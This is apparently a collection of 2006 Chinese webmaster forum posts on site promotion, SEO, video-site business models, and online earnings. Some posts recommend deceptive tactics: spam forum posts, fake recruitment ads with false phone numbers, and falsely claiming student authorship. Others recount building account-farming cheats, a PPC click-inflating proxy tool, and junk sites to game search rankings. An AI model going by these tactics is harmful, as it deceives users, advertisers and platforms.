围绕个人站长的问题想了三年,现在看来我都是在做一些别人做过的事情.构建网站,发展流量,再找广告联盟,谈广告.有人找到一条路走,留下脚印,我在崎岖的山路上扒开野草,仔细寻找他的脚印,跟着他的屁股后面追.我怎么也追不上他们,因为我饿了,前面的食物都被他们吃了,我只能吃到剩下的渣,我的体力跟不上,离他们越来越远.我累了,应该休息下,想想怎么跑,才能吃到美味的果子.站在个人站长这座大山上,不只这个方向才有好果子吃吧?如果能找到一片果林,肯定不挨饿的,那得自己屁股后面的人挨饿才对不仅个人站长需要创新,任何人都是这样.

钱从哪里来,方式很多,比如贪污也算么.贪污也是建立在为贿赂者提供服务基础上的.买和卖,就是利益上的一种平衡.卖服务,卖产品,个人站长卖流量.钱只是一个工具,它最能代表利益平衡.人和人之间,只有双方互赢互利的关系才是才久的.相爱的人常说:我为你付出那么多.下面那句没讲:你能为我做什么.或者不求做什么,希望你能怎么样.无私和情感这种东西很微妙,思想上多少在追求心灵上的满足.对方的一句话,一个动作会促使无私和情感长久.除非是个植物人,反正也听不见,看不着的.让交易对方知道,你能给他带来什么.双方才可能成交.

我能给网友带来什么?

也来谈谈我的推广方法

2006-11-21T21:20:00.003-08:00

我是一个新站长，目前只有一个站，建站马上3个月了，这段时间不断的揣摩研究，也总结了些网站推广的小经验，现在拿来和大家分享，希望可以落伍成功！

进入正题：第一，在影视论坛里推广，去百度风云榜找一些最进比较热门的电影电视剧，或者关注一下社会，比如这几天冯小刚的《夜宴》在点映，9月几号成龙的《宝贝计划》会首映，这些都是热门影片，到时候上网找的人会很多很多，那么我们就可以利用一下，去百度搜一下影视论坛（前几个，不超过第一页，因为都知道第一页和第二页会截走80%的流量，第一页效果更好），在里面发些帖子影片名称，下边连接到你的网站，（这样的流量虽然是垃圾流量，但是如果你放些诱惑比较强的图片电击广告，也会得到些广告费）因为论坛本身在前面，新发的帖子百度也会快速的收录，所以过一两天，有人找你发的影片时，就会出现在前面，这样，你的流量也就来了。再有可以直接搜索一下热门影片，会找到一些求片的帖子（因为大多数影视论坛都有这版块），你在下边恢复一下写上你的网址，这样也会给你带来一些不错的流量，（注意的是论坛管理员有可能发现你是骗子删除你的帖子，那么你就要换个ID再发一次）。

第二，就是要认清你的站的主要来源，主要需求者在哪里，是什么样的人，我的站是个论文的站，经过反复的思考，我觉得需要论文的大多数人是学生，而且是大学生一般才写论文，所以我就就会隔段时间去各大高校帖一写广告，我的广告费用很少，自己买了几支不同颜色的POP笔，找一些比较大的白色的稿纸，在被面写上POP字体，颜色鲜艳醒目一些，我写的内容大致是这样的，某某论文网开通了，某某论文网是咱们学校学生自己创办的，网址是多少多少，欢迎各位师哥，师姐，师弟，师妹光临指导。（当然了到哪个学校就是哪个学校的学生创办了，这样可以拉进距离，有利推广，还好我所在的地方的高校比较多，这样推广起来也容易些）。

还有我觉得广告的话也许不一定要投入很多钱一样可以带来很好的效果，比如在我所在地，有一个很有名气的供求网，每天大约10WIP，已经好多年了，上面的广告费是价格不低，但是他的有尝发布信息却很便宜，我们为什么不发一个招聘信息呢？某某公司，网址多少多少，招聘什么什么人，多少多少，写个假电话，写上你的真的网址，这样效果也不错的。

小弟当站长只有三个月的时间，以上就是在下的一些心得，哪里说的不对，大家多多包含，马上要睡觉了这段时间一直是凌晨2点左右才睡觉的，头很疼因为睡眠不足，我是美工，一点程序都不会，我想说的是美工做站真辛苦，一个页一个页的做，做了半个月了，什么时候能做好还没有眉目啊，原来html的页还有点优势，搜索引擎喜欢，现在什么ASP，PHP的都可以生成HTML了，优势也没了，做美工真苦，在下就差几分就落伍了，希望这次能落伍成功，谢谢！

视频播客的冬天,比以往时候来的更早一些！

2006-11-21T21:20:00.001-08:00

视频播客的冬天,比以往时候来的更早一些

承重的宽带费用，并不高深的技术门槛，一系列的员工开销，暂无赢利模式的视频网站在红红火火的web2.0后进入了困境，大批视频网站裁员，才在视频播客论坛上见了面的朋友，一转身就被裁了，磊客中国，千橡集团，mysee纷纷在裁员，目的为控制成本，规避风险，借用一句话叫做“就算公司裁到只剩一个人也没办法实现赢利”的模式下运做视频播客的确是有点难度。

但是视频的确是有前途的，不然GOOGLE也不会花16.5亿美金收购youtube，而且web2.0 也绝对是有前景的，不然怎么全球上升比较快的站大部分是用户为主，以用户为中心的这类站，不然SINA的首页也不做调整的，更为人性化，但是最近出来的几个所谓的客，好象都无比较好的赢利模式，方兴东辛苦做的博客，现在成为了新浪的嫁衣，但是新浪娶了这位新娘，好象也无赢利模式，不过流量都是赚了一笔，而且拉近了明星和大家的距离，的确是一个不错的做法。但是现在刚刚兴起的视频播客，以及抄得很火的视频搜索，已经都在开始争夺了，视频会不会和文字资讯一样，也只是提供内容，收入还是靠广告？

目前也许还是得这样的，视频这东西一直是属入第三媒体，现在网络抢第三媒体的话，肯定也要借用第三媒体的赢利模式，第三媒体之所有一直是最大的媒体，因为它具备具备广告公司来做销售，而且具备专业的制作团队，保证有一些精彩的节目，有一些首播，这样才可以提高收视率，岳贵个人认为经营视频网站需要加强以下几点：

1，网站形象
形象是最大的财富，形象的好坏是用户来决定，用户是否有好感，信任？忠诚，决定形象的价值，而国内视频网站以美女，自拍，色情，色情为主，这样的站如何提高一个网站的形象？影响一个站的主要因素是：网站的速度，网站的标识，网站的包装，网站的宣传手段，幕后人员的素质等，而且还要培养一批网站的精华内容，内容就是视频网站最大的财富，只有细心发现，用心挖掘，才可以很好的经营。

2，网站品牌
品牌其实只是一个名称，一个符号，但是品牌包含的是属性、利益、价值、文化个性等要素。创造一个品牌绝不是简单的事情，一旦成为名牌，将会带来巨大的经济效益。视频播客属于文化产业，“内容为王”是常胜法宝。节目质量是视频播客的生命，形象是表，品牌是里，表里如一才可以实现双赢。

3，广告收益
广告是现在视频播客主要赢利模式，公司一开始就想到了广告，但是这样就步入了误区，觉得只有广告才算是经营，提经营只是抓广告。即便就广告而言，经营的理念在互联上中还远没有深入人心——等人上门、老大作风现象尚存，主动营销还欠积极，创收潜力没有完全发挥。要提高收益，最重要的是如何做好营销，如何把自己的内容，自己的用户群，精美内容和网站品牌推荐给用户，而且广告不可以影响用户正常浏览网站，这样才可以在今后可能的产业合作、重组赢利模式中占据有利位置。但视频播客的广告，必须是一种娱乐化的新型广告。如何让用户心甘情愿看广告。值得视频播客网站的运营者好好深思，把广告处理得十分个性化，令人并不生厌。同时，为商家量身打造个性化的视频广告，并将其无形地嵌入内容之中。使我们的用户不需要再去区分广告与娱乐节目——因为它们都是那样新奇有趣。

4，财务核算
钱要用在该用的地方，要让钱生钱，而视频播客目前都是摸着石头过河，谁也不知道怎么做，拿了风投的这边烧点，那边烧点，没拿到的就感觉这样好就烧一烧，这不能不说是不懂如何经营造成的，怎么做好财务核算第一步要落实真正的成本核算，再次要寻找亏的原因与赢的出路。同时服务器带宽，人员调配都要细心核算。

既然冬天已经来了，那么春天还会久吗？视频播客还是有前景的，关键就看您准备好过冬了没，同时春天的到来做好准备了没。有兴趣的朋友加加QQ：19710060 或MSN：adidas#biz2008.com 一起探讨如何度过这个不太冷的冬天。

平常心做论坛[0到9000日IP经验][原创申请落伍]

2006-11-21T21:19:00.003-08:00

一直就很喜欢逛论坛，从最初上网开始就是如此，所以当有机会做网站的时候....第一个想做的就是论坛。

由于还是学生，没有太多的钱去买空间,2006年的5月我偶然的机会接触到了网赚这个东东，那时候有个不记得叫什么的联盟，不需要网站就可以做宣传获得钱，并且支付的门槛只有10元，我就抱着做做看的心态去做了，并且加入了网赚的群，这才发现这天底下还有做网站赚钱的一群人（恕偶年幼无知= =//）

于是我一边网赚一边想着自己做站，到处的找免费的空间，在网上翻了好几天，终于找到了一个提供空间的论坛...为了避免广告嫌隙，我就不说那个论坛的名字了，它的管理员叫kein，不知道他在落伍没呵呵！我于是我开始用他提供的免费空间开始做论坛，用的是PW....（不知道是我机器问题不，我打开DZ的论坛很慢）从此走向了做论坛的不归路....

刚开始做的时候，什么也不懂，连最简单的转贴图片都不会，自己慢慢的把自己喜欢的论坛的精华贴，自己感兴趣的东西放到自己的论坛上去，整个论坛就只有我一个人，于是我开始去我经常逛的论坛发广告贴，不到一个小时就被人删，刚开始时我觉得特别委屈= =///不就是个广告嘛...（现在我觉得广告好可恶..那些暴力软件发的）....

一开始用的是一个免费的二级域名，5月底用网赚来的钱去买了个CN的米，自己还满喜欢的，20多大洋，正好那时候听说百度贴吧的人挺多的，于是，我就屁颠屁颠的跑的百度贴吧用自己的新域名一顿猛发，那几天流量来的快啊......可惜接踵而来的痛苦来了！----百度他Y的不收我的新域名...于是我又去查找原因....还傻傻的跑去百度贴吧去要求收录，才发现天下还有这么多人在这申请哦，我都排在100多页以后....不管了，还是做那个二级域名，流量一直在300多左右...

接着暑假来到了...回家休息，连续两个多月没怎么管论坛，每天的100多的IP..我还放了广告= -月收入2块= =///.....以前好不容易招来的几个版主全部跑光....[招版主难啊！广告：俺招版主，QQ85815918]几个热心的会员也都走人了....没办法只有重新来过....

暑假终于过去，回到学校，发现了意外的惊喜，那个CN的域名居然被收录了，8月29日被收录了1页，心中狂喜....正好在那时候发现了落伍，看了站长故事里的好几篇关于论坛的帖子，开始抱着平常心的态度做论坛，每天坚持更新资源，也不去百度贴吧猛发了，专心在自己论坛耕耘（勤劳的农民BOBO），一周以后发生了变化！！！！100IP变200IP了，注意哦，这是没靠宣传的哦...呵呵

于是我开始埋头狂贴...一天100贴左右，我从不和别人一样的标题（内容一样）我发现这个方法很好，我的流量开始翻倍的跳200-400，400-800，
800-900，900-950，950-975。这时候我发现一个问题，他Y的就是不过1000！看来1000是每个站的一个坎吧...没关系！平常心对待！！终于在过了半个月以后这个坎终于让我给过了！流量开始飙起来...2000...3000...5000....9000，现在我还是在用免费空间= =///没办法没钱！~不知道有人赞助没.....

后面的一些东西我就不说了，从0到9000，我开始了解做网站这个行业，从0到9000，我开始了解平常心的对待，平常心的付出，总会有收获，从0-9000让我学到了很多学校里学不到经验，关于坚持，关于耐心，关于我自己....！！

终于打完了！我希望我能因为这个帖子而落伍，因为我很想落伍，如果不行！OH...平常心！再写一篇！

网站宣传也要“对号入座”

2006-11-21T21:19:00.001-08:00

您还在为您的网站没有流量发愁吗？还在为您的流量不固定发愁吗？那么，请您花5分钟时间看完这篇帖子。

02年开始做站到现在，我总结了几条网站宣传、推广应该注意的事项：

1、网站必须有一定的内容，坚持更新。

2、宣传和推广自己网站时，不能盲目的到处乱发帖子、乱做广告。（很容易遭到人家的反感，而且不会有太大效果）

3、一定不能经常去百度帖吧和知道去宣传你的网站（很容易被封，我是吃过亏了）

4、在宣传您的网站时，一定要去那些和您的网站内容相关的地方去，这样来的IP很有可能下次还会来。（比如：您的是电影网站，就去那些大的电影、BT网站或论坛去做些宣传。您的如果是小说网站，可以去那些与文学、小说、论坛等有关的论坛或网站做些宣传。我可没有教您去人家网站发广告帖子啊）

我就是按照以上的方法推广的自己的网站，现在的网站，因为20天左右的宣传，经常出现不能访问，问了空间商，他说是因为CPU消耗过大，还截了图让我看，我的小站竟然占CPU 56% ，也不知道真的假的，说起来也不多，我的小站到今天整整一个月，现在网站基本就固定在2500IP、40000PV左右，流量很稳定，现在基本不敢宣传，一宣传就会出现不能访问，郁闷，正在考虑换空间或和朋友合租。

如果您感觉一个月稳定在2500IP、40000PV左右还行的话，不妨按照我上面说的试试，希望对您有用。。。。

我的网站被Google惩罚了，真实的经验交流呀，希望别的兄弟们别走这段弯路了！

2006-11-21T21:18:00.004-08:00

我做的是关于情报垂直搜索的网站，qingbao是域名，可惜 .com .net .cn 都没有了，只有 www.qingbao.org 这个域名还没有被注册，我就就注下了，之后的几个月是不断的调试程序（因为做的是搜索，webserver都是用C自己写的），等到正式上线前，觉得.org还是不太好，将来不好进行商业运作（虽然是刚开始，还要为以后做好计划的，呵呵），还是得有一个.com的域名，就退而求次，选择了www.yanpan.com 这个域名，虽然词义比较生涩，但看起来还是挺顺眼的，网站也叫《研判情报信息网》了，整个网站目前有两台服务器，其中www.yanpan.com 作为主页的WEB SERVER，在一台服务器上，一个专门提供搜索服务的服务器，域名为 search.yanpan.com ,那个qingbao.org 没啥用了，也顺便解析到 search.yanpan.com 这台机器上，结果噩梦就来了，我是一个搞软件开发的人，不太懂这些SEO之类的知识（通过一段时间的恶补，现在明白一些了，哈哈，欢迎交流交流），google开始收录我的网站了，因为搜索的WEB Server是我自己开发的，通过Socket我能看清每个爬虫的来路请求什么的，呵呵，之后用site:yanpan.com 发现收录10000多篇文章，但是site:qingbao.org 也收录的10000多篇，我还在纳闷呢，google怎么知道qingbao.org呢（后来发现一个好友的网站上还挂着当初www.qingbao.org的友情链接呢），之后过来几天，再用site:qingbao.org 来看一篇都没有了，就说找不到qinbao.org，唉，这个域名被K掉了，site:yanpan.com 也由10000多篇，变成了700多篇，之后是200多篇，之后只有首页1篇了，已经有快两周时间了，完蛋了，两个域名都被K了，看来搞双域名是不行的呀！！！！可是我真的挺冤枉呀，我确实不是存心作弊呀~~~~

前几天，我又看了看百度，结果qingbao.org 收录了39200篇，yanpan.com收录了39200篇，sogou收录了qingbao.org 176000篇，哇塞，我有了前车之鉴，可不能再被K了，我赶快编制程序，呵呵，再有人或虫访问www.qingbao.org 通过http头能够得到，我就返回一个 301(永久重定向) 给他（它），并用search.yanpan.com 替换 www.yanpan.com ，百度的爬虫很聪明，立刻就会访问 search.yanpan.com，sogou的爬虫比较钝，就完事了，也不理会301命令，呵呵~~

虽然网站被google K了，不过它的爬虫却一直没走，还在不停的访问呢，希望有一天能解套吧，不知道什么时候了~~~

第一次发文，不小心写了这么多，呵呵，真实体会呀，大家共勉，另外加一句广告哈，欢迎大家与我建立友情链接！！！共同发展共同进步,联系方式：QQ:254565！！！！

我是怎么白手起家赚到100万的

2006-11-21T21:18:00.003-08:00

哈，细细算一下，我已经从网上赚有100万了，这里做一下小结。
也用这个贴子来申请一下落伍。
希望能够通过。

我开始接触电脑是在2001年，当时用的机器是一台586，当时应该是较落后的东西了。首先说明，我可是一个十分好学的人，没这个也赚不到100万。由于电脑太落后，我不能学习图象设计等当时热门的东西，但我不死心啊，就拿这台电脑练习BASIC编程。当时我的名言就是不要把电脑当成一个打字的工具。慢慢的入了门，然后学了VB,FOXBASE,FOXPRO,VC,SQL,ASP,C#,ASP.NET,PHP，时下流行的各种语言我都有解，说到水平，哎，只能说是接触很广，但都不够深入。上面的内容几乎全是自学，只有一个人曾给过我一些指点，但也只是有几次。我就靠这一股不服输精神，硬是一路学了下来。哈，回头看看，我自己都会吓一跳的。现在做个什么工具，程序什么的应该都不是什么问题了。

我是从2004年开始上网的，由于家里比较贫困，我上网的目的与大多数人不同，我上网就是为了寻找机会。我也不知道会有什么机会，但我知道，在互联网发展的初期（我认为现在还是互联网发展的初期），网上肯定会有许多的机会，如果我不去寻找，放过了，以后会后悔的，我可不想以后后悔。
学习上网的过程和大家估计是一样的了，由什么都不知道，到逐渐了解了网络的一些操作。

有两点对我网上起家有很大帮助。
第一，我上网是有目的的，不是为了玩。我很少在网上玩游戏，在网上聊天，聊天也是为了交到能够给我帮助的朋友。
第二，我学习过编程，因此我不管用什么软件，或者看什么网站，都能从程序员的角度去看它。尤其是我也解HTML语言的一些细节和网络传输的一些知识，对我理解网络流量是非常有帮助的。

下面谈一下我的网赚历程吧。
我最开始接触到的网赚是《新闻时报》的一个站，当时我正在学习VB.NET和网络编程，于是我就用我所学的知识写了一个作弊程序，哈哈，这算是我的第一个作品。我没怎么用这个程序，我写这个程序的目的就是为了练习编程。但我把他发给了我的一个朋友，用我的程序，他可以同时挂几十个账号，但当他账号上的钱到该付钱的时候，被删了。
另外在我写这个程序时，我正在参加自学考试，准备备考《大学英语自学教程》。哎，我接触到电脑后，我的自学考试情结就受到了严重的打击，根本没有心思坐下来去念什么《大学英语自学教程》了，哈，但我用电脑收集了一少资料，还写了一个小工具《大学英语自学教程课文译文语法讲解完全组合 V1.0》，做为一个软件发布了出去，现在在各个下载站都可以找到。并且还做了一个小站，http://en.free20.com《大学英语自学教程资源大全》。说远了，再回到网赚上吧。当时为了学英语，我开始浏览项文网站，看到了一个注册赚钱的东西，我想啊，一边学英语，一边赚钱也不错，管他赚不赚呢。于是我用了三个星期得到了我网赚的第一桶金，5美元。当时也开始接触一些网赚的论坛，象网赚之家。并且加入了几个群。当然我也不会忘记老本行，我写了两个协助别人做注册的工具，一个协助大家交流注册攻略的，另一个叫抢任务机。并且办了一个小站，《网赚软件加工棚》，现在已经关了。我靠做注册和软件，一共大概赚有百十来美元，并且发展了上百的下线。后来因为注册账号被K，放弃了做注册。
虽然我放弃了做注册，便我好象找到了让我的知识变成MONEY的路径，那就是写网赚程序，哈
后经人介绍加入了一个做搜索的群，在群内认识了几位朋友。有一位朋友让我帮他写一个兼找代理，验代理，刷PPC，全程一体软件。我花了一个月左右的时间写成。得现金1000元RMB。但由于软件的性能和当时的PPC大量K号，软件没有投放使用。
后来，又一位朋友找我，让我写一个能够自动完成搜索的PHP程序。我花了三天时间完成。条件是要求他也帮我开一个搜索站，也就是现在的FREE20.COM。我的发迹从此开始。
开始时我和那几位朋友商量好的，是他们传授给我PPC的相关知识，我负责给他们写程序。但PPC这个行业当时还是十分封闭的，哎，现在估计也还比较封闭。其它的各个行档也很封闭啊，哎。那位朋友没尽到传授PPC相关知识的义务，并且还曾诱导我犯错误，晕，替他来做FEED。后来我只好找另外一个人合作，条件同上。哈，我算是掌握了一定的相关PPC知识。并且由于我有编程的功底，很快，他们在安装FEED，测试FEED时还需要我来帮忙。并且我的站的流量也在不断的增加，对我朋友的服务器造成了一定的影响。于是我的朋友又以我违背合约为名，要删除的我站。幸好我在当天就将我的站移到了另一台服务器上，免费让我用啊。这样有一点一好，就是代码流传出去了。我又在第一个月收到FEED支付后，马上租了一台服务器，将自己的网站搬出了我朋友的站。但程序留在了那台服务器上。
之后的事情就比较顺利了，流量不断的增加，FEED我们知道的也越来越多。资源也越来越多。程序我也在不断的改进。程序已经让我改的我一个月不进行网站管理，网站也会自动的运行，哈哈。基本实现全自动。

一直到现在，算一下，赚了大概有100万RMB了

由于网站管理简单，所以我在有空的时间内，又做了其它几个小网站
象现在的
在线小游戏http://games.rss99.com
免费空间站http://web.free20.com
RSS聚合新闻http://www.rss99.com

但在做站的过程中我慢慢的发现，我还有许多的知识没有学习到啊。象SEO网站优化，网站信息的采集（我的站也是采集的，不过采集程序是我自己写的，哎，早知道有现成的，我就不去写了），还有如何发展真正的流量，等等

很早我就知道了落伍这个论坛的，不过是最近开始做网站后，才想到来这里好好学习一下，哈，不好意思，有些迟到的感觉

希望能够通过我这一篇文章，让我落伍。

我真的想和大家进行交流啊

我的QQ：125250901

如何让百度天天更新你、收录的更多

2006-11-21T21:18:00.001-08:00

只谈baidu——其他话题以后再谈

最近做了几个垃圾站，从中体会到一点baidu收录的经验，今天我给大家谈谈！

总看到不少的做站的人说，今天我的站收录了多少多少页，我的站多久被更新一次……那么，到底baidu是如何更新、收录呢？怎样让baidu经常更新你的站、收录你最新的内容呢？

我对此还没有形成系统的理论，先谈下具体做法，供大家参考，欢迎讨论！

首先，做好一个站，网站至少要有一定的内容，然后再把你的站提交到baidu，最近我观察了下，baidu收录新站的速度比以前快多了，一般1天—3天就能收录，所以，你要是有条件，就长去baidu查你的站是否收录。

收录之后，我们就开始我门的第二步——保证经常更新：当时，我是第二天发现被收录了，大概收录了30多篇文章，于是就立刻更新了网站内容，又更新了有10多篇，第二天，一查，哈哈，又把更新的10多篇中的8篇更新了！

从收录的那天起，我基本上都天天更新，收录的文章也一天比一天多，baidu更新我的站是一天一更新

第三步：流量之旅，其实，天天更新你，如果你的关键字上不去，也是徒劳，光给你好话，没有实惠，还是没有动力，但是，如果天天更新你的站，那么，做点关键字也就不是什么难的事了（什么是热门关键字？如何发现热门关键字？以后我们会专门讨论的）。

实例：我最近做了一个垃圾站，就是用的是关键字，从提交成功，到被baidu拔毛，一共用了2天，流量统计用的是51.la的，共计来了1800多个IP！

成功关键：更新一个，尤其你的站是新提交的，被收录后，经常的保持更新，做起关键字很容易！

失败提示：关键字别做的过火，做的过了，很快就会被K！！关键字的简单做法就是慢慢来，别做的过快，密度过大，比如我刚才说的这个失败的例子，就是这个站的所有文章都集中到了一个关键字（关键字讨论将新开贴讨论）

我能想到的就这么多了，还有好多想法，需要你来问，我才能想起来！

踏雪走在梦想的路上

2006-11-21T21:16:00.004-08:00

“踏雪无痕” 这个名字在IT圈和个人站长群里是很有影响力的。他现在是“小说中国“的站长，曾出任过www.159.com的总裁。2006年10月，他选择了自己创业的道路，创建了网聚天下网络科技发展有限公司。致力于公司主站”小说中国“www.xscn.com的建设和发展。他决心用一年的时间把“小说中国”做成国内最大的中文小说聚合门户。我有幸在超级站长创业大赛赛事平台认识了他,借此机会,我采访了这位互联网的传奇人物。

问：您好!很高兴您能在百忙之中接受我们的采访。说起“踏雪无痕”这个网名在目前的站长中间也是很有份量的，您以前并不是做计算机专业的吧，后来又怎么想到自己做网站创业呢？

踏雪无痕：我以前是文人，做过电视台记者，党刊记者，编辑。97年的时候我在老家创办了一份现实中的小刊物，去采访我们那里一家电脑公司老总的时候，和他谈的很投机，他力邀我加盟他的网络公司，做负责网站业务的副总，从那个时候我开始接触网络。我之所以加盟那家网络公司是因为我在北京上作家班的时候，对当时中国的文学小圈子很厌恶，当时的纯文学刊物都是一帮一派的，你不是那个圈子的人根本挤不进去，文学新人根本没出头的机会。网络的出现让我感到了一个全新的机会。在网络面前，每个人都是平等的，只要你有才华，就可以被别人承认。因此我放弃了自己刚创办不久的刊物加盟了那家电脑公司，开始了我的网络生涯。

问：您在做网站的时候有没有遇到过什么困难？或者有没有让您最难忘的一件事情可以让我们一起分享的。

踏雪无痕：我自己做网站的确切时间是1999年11月份，那时候刚从上面说的那家电脑公司辞职。因为那家电脑公司的老板转行做别的生意了。我创办的第一个网站叫美人鱼www.renyu.net.刚开始的时候只是个论坛。那时我几乎身无分文，网站的空间费也交不起。也没有自己的电脑，只能在网吧上网维护自己的电脑。临近春节的一天夜里，我身上只剩下了两元钱，那是我的全部家产。去网吧上最后一次网。空间商一直在催我交空间费用，威胁我再不交钱就把网站关掉。我当时感到很绝望。就在那天夜里出现了奇迹。一个上海的网友拯救了我和我的网站。那个网友叫野风32。上海人，她在上海热线看到了我的文章，在那天夜里主动加了我和我交流。那天夜里我意志很消沉。她仿佛感到了我的情绪，追问我原因，后来我把我的困境告诉了她，她要了我的一个银行帐号。我没想到的是第二天上午就给我划过来1000块钱，解决了我最大的难题，网站空间问题。过了不久又汇款给我买了电脑，资助我生活费用。让我能在家里维护网站。可以这么说，没有野风32，就没有我的今天。她不图任何回报的帮助让我毕生难忘。

问：听说您以前就做过一个叫“美人鱼”的文学网站，后来为什么又不做了呢？开始创建“小说中国”起初的想法是什么?网站发展到现在也取得了很大的成就了，您认为哪些地方可以让其他站长借鉴的，哪些还有待提高？

踏雪无痕：我首先声明一下，美人鱼一直在做，从来没有放弃过。美人鱼在2002年的时候做的已经很有规模了，在国内媒体征稿论坛里已经很有名气了，2002年那一年通过美人鱼社区，社区会员在传统媒体一年发表了400多篇稿子。2003年51节的时候北京的一家投资商来我的老家商量投资的事情。想给社区投资100万人民币。后来因为种种原因协议没有签成，社区内部管理人员闹起了纠纷。有两个很重要的管理层离开了，使社区遭受到了很大的损失。这件事情过去不久，社区就开始遭到了一场旷日持久长达半年的DDOS攻击和服务器入侵攻击。经过这半年的攻击，社区的人气散了。我因为生存问题开始出去工作，社区开始一落千丈。有句话叫做：要发展，应该先学会生存。我决定学一下蒋委员长搞一下曲线救国。经过两年的发展，我现在已经能养活自己，手里也有了一些发展资金。所以又出来继续我的梦想之路。做我的文学梦。

小说中国www.xscn.com是一个刚成立半月的新网站，也是我新公司的主打网站，现在还谈不到有什么成就，但我有信心用半年的时间把这个网站做进全球500强网站之内。因为这两年我积累了丰富的互联网人脉资源和网站经验。也积累了丰富的网站推广经验。

我想对其他站长说的是，如果你想挣钱，办法多的是，网络只是方法之一。我始终在考虑一个问题，就是网站的终极之美。真正的好网站是我们的一个梦想，而不是赚钱的工具。为了理想而战，走在理想的路上，是一件很幸福的事情。

问：曾经在一个论坛里，看到过您自称“文人”，能谈一下从“文人”转变成为“站长”的一些感受吗？

踏雪无痕：我自始自终都认为我是一个文人。过去我没接触网络的时候，我的小说就得到我的老师们的很高评价，我的老师都是现在所谓的中国文坛的泰斗人物。我曾拒绝过《人民文学》对我的力捧，因为我不愿意为单纯发表稿件而放弃自己做人的原则。06年我写的一部网络小说现在也有3000多万的点击率，几万论坛转载。幻剑书盟刚和我签了这部小说的无线阅读版权协议。当然，现在不能静下心写了。毕竟我还有个站长的身份。过去我的朋友们又四个字形容我：“桀骜不逊”。我眼里见不得不公平的事情。因为我见不得百度的卑鄙和丑恶，发起了反百度联盟。其间受到过很多人身威胁，也受到过诱惑。我都咬牙坚持下来了。我认为做站和做人一样，要有自己的原则。

问：现在很多站长对做站的方向都很迷茫,不是想着一夜暴富，就是希望能够突然间得到巨额的投资，您怎么看待这个问题？

踏雪无痕：其实现在互联网的机会还是很多的。关键要看你的眼光。也要相信自己的原则和判断。要学会专注，不要轻易放弃，如果你认准了一件事情，就要有信心有恒心坚持下去，不要做墙头草，跟在别人屁股后面跑。
关于投资，就我个人来说，我现在如果想拿投资，100万金额以内的投资很容易的就能拿到。但是资金不是最重要的，关键是网站的方向和网站团队的执行能力。起点中文起先也是个人网站做起来的，两三年的时间把网站做进了ALEXA100强。据我的观察，他们也只花了几十万资金而已。

我在网站发展的第一年不会考虑融资问题。我有能力让我的网站和我的公司员工很好的生存下去，去专心做自己想做的事情。

问：目前网络广告联盟很盛行，您觉得对个人网站的发展有什么影响和意义吗？亿起发是亿玛公司在2004年初就开始研发和不断完善的联盟营销平台，你们之间有合作吗？

踏雪无痕：我以前就是一家网络联盟的总裁。网络广告联盟可以给站长带来收益，也可以为推广的网站带去巨大的流量。我认为网站联盟是个人网站获得收入的重要手段之一，也是网站推广最有效的方法之一。

亿起发是我以前的同行，在业内有很大的影响力，希望今后能在各方面进行很好的合作。

问：今天借2006中国超级站长创业大赛能够采访到您，我很荣幸，您是如何知道这个大赛的呢？听说您也参加了，出于什么目的呢，最后的资金还是其他？这个大赛中会让参赛的站长自主选择顾问作为自己的评委，您会选择谁呢，为什么？

踏雪无痕：这个大赛是我的好朋友推荐我加入的，我参加这个大赛拿不拿奖金是次要的，和大家能做一次交流，多认识些朋友是我的目的，朋友推荐我参加比赛的时候我看了一下这次比赛的顾问名单，几乎有一半顾问我都认识，很多人都是我的朋友，比如木蚂蚁，图王，张本伟，王通，还有厦门书生的庄总等朋友。以前都曾在网络上做过交流。我选择评委当然要选择我的朋友，因为他们对我很了解，也能比较准确的说出我的优点和缺点，督促我更好的改进自己的不足。

问：您个人认为亿玛公司目前举办这个站长创业大赛对个人站长有什么意义？对整个互联网行业有何影响？

踏雪无痕：我认识这样的大赛给了很多站长一个获得机会的舞台。网络相对与现实社会是比较公正的。我希望通过这次比赛，能涌现出一批新人出来，为中国的互联网补充一些新鲜血液。如果你是站长，而且网站有很好的发展前景。我希望你能在这里获得资助，去完成你的梦想。

我在创业初期是幸运的，遇到了野风32那样热心的网友，才使我的网站走到了今天，我希望这次大赛也能像当初我的网友无私的帮助我一样，帮助那些特色有前景的网站迅速发展起来，做好伯乐。为互联网的明天培养和发现人才。我想，这就是这次大赛想给与站长们的意义。

问：参加这样的创业大赛，您最大的受益在哪里？

踏雪无痕：希望结识更多的朋友，互相学习，共同进步。

问：对自己夺取最后的冠军并拿到50万投资基金有信心吗？

踏雪无痕：我是也有野心的人，我的目标无法用金钱来衡量，我一向对自己有信心，从来不懂得放弃。我现在不缺钱，公司目前的资金在不赢利的情况下维持一年没有任何问题。

在和踏雪无痕的交谈中,他的经历让我深有感触,在他的身上我看到了文人墨客的内敛、沉稳、悠然、简约而不简单,也看到了一个互联网行业领袖人物的风采.交谈结束时,踏雪给我们的站长朋友一点建议:如果你做站是为了单纯的赚钱，我希望你放弃；如果你是为了梦想而战，希望以后我们是朋友。

我对搜索引擎优化与站长赚钱的个人想法及意见

2006-11-21T21:16:00.003-08:00

(搜索引擎优化):有了搜索引擎就注定有人研究他，挖掘他其中的奥秘。有正规的研究者，也有捣蛋的研究者。网站站长通过SEO优化网站来赚钱已经不是一两天的事拉,我估计有80%左右的站长已经懂得SEO优化拉,说到自己我只能说是一个学习者(就是还要不断学习新的知识),因为我知道搜索引擎的排名方法可能随时更新变化（不信你问下李彦宏^_^）。

什么样的行为是捣蛋的SEO研究者？（以下引用一下百度的内容）
在网页源代码中任何位置，故意加入与网页内容不相关的关键词。
在网页源代码中任何位置，故意大量重复某些关键词。即使与网页内容相关的关键词，故意重复也被视为作弊行为。　　
在网页中加入搜索引擎可识别但用户看不见的隐藏文字。无论是使用同背景色文字、超小字号文字、文字隐藏层、还是滥用图片ALT等方法，都属于作弊行为。　　
故意制造大量链接指向某一网址的行为。　　
对同一个网址，让搜索引擎与用户访问到不同内容的网页（包括利用重定向等行为）。　　
作弊行为的定义是针对网站而不是网页的。一个网站内即使只有一个网页作弊，该网站也被认为是有作弊行为。　　
有链接指向作弊网站的网站，负连带责任，也会被认为是作弊。

什么样的行为是正规的SEO研究者？
我的理解为三个“相关”：相关网站，相关内容，相关链接。
举例说明：百度搜索“亚洲交友中心”。
从第二个开始，所有的都是亚洲交友中心的AD站，他们依靠的就是相关性来获得较高的排名的。网站整体符合关键词了，内容符合关键词了，想要靠前那么就需要自己的SEO本领了。
大量的外部链接，当然这个链接是要有质量的（符合三个相关的），有质量的链接是有许多技巧的。这点是可以肯定的。也许还有其他的许多技巧，比如服务器的快慢，网页的优化细节等等；欢迎大家共同探讨研究，QQ：68890339

